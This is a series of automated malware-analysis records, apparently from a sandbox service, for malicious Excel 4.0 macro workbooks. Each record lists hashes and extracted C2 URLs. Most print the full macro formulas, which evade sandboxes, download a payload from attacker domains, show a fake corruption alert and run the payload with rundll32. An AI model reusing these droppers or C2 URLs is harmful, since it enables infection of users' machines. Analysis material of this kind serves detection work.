CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PJZWEG0ugo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a41d70c9c27235d966b89152aef345b1a2a26553562c9967b334d143d1d73290"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a41d70c9c27235d966b89152aef345b1a2a26553562c9967b334d143d1d73290","filesize":144384,"md5":"926cc632d8143581e48f25a9af489361","sha1":"8dfe37537da1436f71c094eee7cac3b8e2c1be87","sha256":"a41d70c9c27235d966b89152aef345b1a2a26553562c9967b334d143d1d73290","sha512":"ccae6380f5b4b9c396c3de350841c53c563febcf99055b55c99e3b46ff564652d8d679ad12a8800571f306076c9558be5d9819e1f01288ad65aa42c805b36584","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a41d70c9c27235d966b89152aef345b1a2a26553562c9967b334d143d1d73290.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"1CO7s9ea0i\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4243a1588fc1438ef543011f025c9407cdc908be36e1a6ef09b0a4618f702db"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a4243a1588fc1438ef543011f025c9407cdc908be36e1a6ef09b0a4618f702db","filesize":209920,"md5":"ca193c6673b7a74570e559aca5681ebe","sha1":"f7be9697a7749b9325de56a3ed032cb9f8ce6b11","sha256":"a4243a1588fc1438ef543011f025c9407cdc908be36e1a6ef09b0a4618f702db","sha512":"b6220da85108a270e9c25c9a6833416384f29a82ed562fcc2a686c9e0417cbfe4e1d322a9d6d9cc43a2934f02934aca10c84b4b9c2f33a206de0a347391acf2f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4243a1588fc1438ef543011f025c9407cdc908be36e1a6ef09b0a4618f702db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Qz0VGdaZa8\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4387f9bcdfa5995163cf7c60a7cf9da878ac405f512e953bc9b103cfc148ab9"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a4387f9bcdfa5995163cf7c60a7cf9da878ac405f512e953bc9b103cfc148ab9","filesize":170496,"md5":"1a61dad598a9abd832b90496b583ea65","sha1":"10ac2c7e8414b16c3d74ca0224e4bba84dd91458","sha256":"a4387f9bcdfa5995163cf7c60a7cf9da878ac405f512e953bc9b103cfc148ab9","sha512":"af799672c7f4b6aebb000b286c529459833709c51e451cc5b7b01af111c0f80da8ec6c45d44ba1e581153eb655e54703df8020d0d8f43604928f3aefd7ef0f4e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4387f9bcdfa5995163cf7c60a7cf9da878ac405f512e953bc9b103cfc148ab9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"16DVkYcnld\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4389d510d00cda93654c7531eba4cb3086e98a404594be0e25552ac3d48dab8"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a4389d510d00cda93654c7531eba4cb3086e98a404594be0e25552ac3d48dab8","filesize":185344,"md5":"edacb682f987949357095eecb4f16584","sha1":"cafd9e76791a26c6be38719472bde78657d3dcc4","sha256":"a4389d510d00cda93654c7531eba4cb3086e98a404594be0e25552ac3d48dab8","sha512":"f811bd4a80c025ff4e49718baadde425b97cc8e19f4776f900f484c7cdcd7742d6c064440fb6f3cf2f33ac34a85546f793acefea39e75fe91d9fd15c46256eb6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4389d510d00cda93654c7531eba4cb3086e98a404594be0e25552ac3d48dab8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a43bfd018518eb4ba2b497b324d9b0b18c8ca1f3cae889674480a5b6f0bf743d"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a43bfd018518eb4ba2b497b324d9b0b18c8ca1f3cae889674480a5b6f0bf743d","filesize":185344,"md5":"db4cf3050165b2d4de6a67c3a3af8072","sha1":"74a899ff57efd97914131eedc1c95c9bebd58eb6","sha256":"a43bfd018518eb4ba2b497b324d9b0b18c8ca1f3cae889674480a5b6f0bf743d","sha512":"4d1092c10794fda483756ae432204113f2e361144d19766420ad392f1a1ada2b2b067daaec922d33c8b98d01c8a5cdb411ea56edab1e8d8118773dbdf62ca838","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a43bfd018518eb4ba2b497b324d9b0b18c8ca1f3cae889674480a5b6f0bf743d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a44e2e1b3484a147db28f18be729aeb3d6d33100a837b06396808613ada9e9b9"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a44e2e1b3484a147db28f18be729aeb3d6d33100a837b06396808613ada9e9b9","filesize":167936,"md5":"0bdd078458928ac37156dba6fabff6c7","sha1":"7b854482181e32df0ca03ab94edd90b93336ca09","sha256":"a44e2e1b3484a147db28f18be729aeb3d6d33100a837b06396808613ada9e9b9","sha512":"78c93b7c26ce04be8897804aa084b65d8fc381031512159d0f9ab1b65c400a3d15e4c49c36733148ee20a84d45427cdfb1afffb93756d20287e87e8c8d50b378","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a44e2e1b3484a147db28f18be729aeb3d6d33100a837b06396808613ada9e9b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zZIt6gIRC0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a455a6c7b8e65224065ec259f28a76b46e898c615e17fc8c1b7ac988d8bd8a65"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a455a6c7b8e65224065ec259f28a76b46e898c615e17fc8c1b7ac988d8bd8a65","filesize":112640,"md5":"3c98388b65ba63309ffff007a2df846f","sha1":"0700cb56002125ae212b8011ce3faf577502993b","sha256":"a455a6c7b8e65224065ec259f28a76b46e898c615e17fc8c1b7ac988d8bd8a65","sha512":"7cd0f109e6f248116cc7f300807a72268b0eac620695802e138c353fb441bcae476bb1850de9881912411fefa3117e58700343f0408984185f493576a93cd0a9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a455a6c7b8e65224065ec259f28a76b46e898c615e17fc8c1b7ac988d8bd8a65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a48e0c60dd2a3dbac103f96fc2562c142de678e5855a417ede5445444a411259"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a48e0c60dd2a3dbac103f96fc2562c142de678e5855a417ede5445444a411259","filesize":206336,"md5":"78f3b0218e1d3ec37ae17f526ef84def","sha1":"dabb553e7a2c30183abdc97f0981f490cae80be8","sha256":"a48e0c60dd2a3dbac103f96fc2562c142de678e5855a417ede5445444a411259","sha512":"d7e7cf5be78826b2557dbff6aaa2217cb2911ee082b51860e49f626fa782790eee82eebf8392f85b591bc3ff1c0c536cf56f0b952f99625fa57934c3ccf0a325","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a48e0c60dd2a3dbac103f96fc2562c142de678e5855a417ede5445444a411259.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"USyo9ds1VH\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4a471807f267f3e9f35884aa27f9751b45759ed5e0e61edf2d650cda912a84c"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a4a471807f267f3e9f35884aa27f9751b45759ed5e0e61edf2d650cda912a84c","filesize":206336,"md5":"4990b257905efb357a89e5baa2261b73","sha1":"d581fa9ab616a8cf5573cc0eb704d66d0eef8b1e","sha256":"a4a471807f267f3e9f35884aa27f9751b45759ed5e0e61edf2d650cda912a84c","sha512":"6559194b350671d2c17a487e8f16dec8d532c6e5b6d2819d53bbaeda1a918f241780e6efc4bea38776a537f216525cb28b3553634b6dcc0d1138409f9c1706fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4a471807f267f3e9f35884aa27f9751b45759ed5e0e61edf2d650cda912a84c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rY2vFFQ66q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4a5d4c4031efc6390b2fc1efc175dca6ca3ce1c4f1f89bce390086672febc73"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a4a5d4c4031efc6390b2fc1efc175dca6ca3ce1c4f1f89bce390086672febc73","filesize":209920,"md5":"eeca1affdc04ea6a81bc13bdab79b8b8","sha1":"ec86b6bb023c6688ed7932cec8539350359bdcb0","sha256":"a4a5d4c4031efc6390b2fc1efc175dca6ca3ce1c4f1f89bce390086672febc73","sha512":"7af8569da6f9db8df3ae791558c3987da15166456e58daa112b01896a2844c7e3fb3fbff45660eb5dc070a123ca087e9739c6a1a39d92ec01eb8c8d34c594ded","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4a5d4c4031efc6390b2fc1efc175dca6ca3ce1c4f1f89bce390086672febc73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iagKvXaFIc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4ab70c7edd9678e0714ec28867ca4c030759b353da0c0b2465fd7ee84b4eaf2"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a4ab70c7edd9678e0714ec28867ca4c030759b353da0c0b2465fd7ee84b4eaf2","filesize":152576,"md5":"73396966f57a4d5d4ae6c47e53c7ca51","sha1":"ed09fed3aa7e00493f5a24b3ed0740210da36918","sha256":"a4ab70c7edd9678e0714ec28867ca4c030759b353da0c0b2465fd7ee84b4eaf2","sha512":"fd37aa7a9a39a6fefb2f05ce2b700c517ce8cd3754ff84a8d128f26b8008bca400bbe3be623c0c34d0800bde2d181d481f4db238801ba6c7b91cfcc4b99f5cae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4ab70c7edd9678e0714ec28867ca4c030759b353da0c0b2465fd7ee84b4eaf2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PgLFaLhiC6\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4f4cc472fc33b6849417b0012cdb0bb0cd6fb6319d784dbe1eb71c4953f9ded"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a4f4cc472fc33b6849417b0012cdb0bb0cd6fb6319d784dbe1eb71c4953f9ded","filesize":141824,"md5":"a275f252705af79a9e9cc5ffb7ea0ce6","sha1":"74928111093549f25fafd57fe121b04d0d03860d","sha256":"a4f4cc472fc33b6849417b0012cdb0bb0cd6fb6319d784dbe1eb71c4953f9ded","sha512":"465477ac3983b6a8551b09beeff8c89c80136d8931761859d8dc24190f3e7c390bcd9b9ebe60454e175d9b3494d5ed79583e1b1eb684bc4175c3af8629c331fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4f4cc472fc33b6849417b0012cdb0bb0cd6fb6319d784dbe1eb71c4953f9ded.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"oPr5wFrSrc\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a4f6253800c76ef3fd8aa8811006e38f18af4b633a6278efe47dbfb992724976"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a4f6253800c76ef3fd8aa8811006e38f18af4b633a6278efe47dbfb992724976","filesize":168448,"md5":"6f8b166822cfa223233e15af022e1492","sha1":"6c3291c0e3960b0f12edcd3c33a391a8f95169ec","sha256":"a4f6253800c76ef3fd8aa8811006e38f18af4b633a6278efe47dbfb992724976","sha512":"b98c24cf89bbbefcd57d8b902a6de494ac632dc581d09b6ff061e72750bb3fbb77b3519c74fc1e6bde190700ce3e9dc6e7d76e4c254addf063ab5686166b2902","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a4f6253800c76ef3fd8aa8811006e38f18af4b633a6278efe47dbfb992724976.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b3LRBToLyJ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a501dccf8c009691ecf140e675c0658ac8f19af4d56d9e593296b075d07e53c0"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a501dccf8c009691ecf140e675c0658ac8f19af4d56d9e593296b075d07e53c0","filesize":171008,"md5":"460a597487899a78b5219314572179cb","sha1":"780c56d637ad15cf066e999e073f367d829dade3","sha256":"a501dccf8c009691ecf140e675c0658ac8f19af4d56d9e593296b075d07e53c0","sha512":"b55cfc02d0b3dc99f85d54b03d38dbac8d57617fbcadd5173bf71629a4dfc40dc59527bbb255a9eb7dbf6836552bc234a1b9ee6088230db1bf8ce1d619e47148","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a501dccf8c009691ecf140e675c0658ac8f19af4d56d9e593296b075d07e53c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pbxarPNlwc\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
